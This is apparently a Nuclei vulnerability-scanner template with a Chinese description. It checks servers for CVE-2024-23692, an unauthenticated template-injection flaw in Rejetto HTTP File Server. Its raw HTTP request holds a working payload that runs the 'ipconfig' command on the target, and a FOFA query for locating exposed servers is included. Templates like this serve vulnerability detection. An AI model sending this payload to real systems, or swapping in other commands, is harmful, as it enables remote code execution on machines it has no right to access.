http:
    - matchers:
        - part: body
          type: word
          words:
            - Windows IP
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
          Host: {{Hostname}}
id: Rejetto-unauthorized-RCE-CVE-2024-23692
info:
    author: Superhero
    description: |-
        fofa: app="HFS"
        Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞，该漏洞源于存在模板注入漏洞。成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
    name: Rejetto HTTP文件服务器 未授权RCE漏洞(CVE-2024-23692)
    reference:
        - https://superhero.blog.csdn.net/article/details/139607986
    severity: high
    tags:
        - RCE
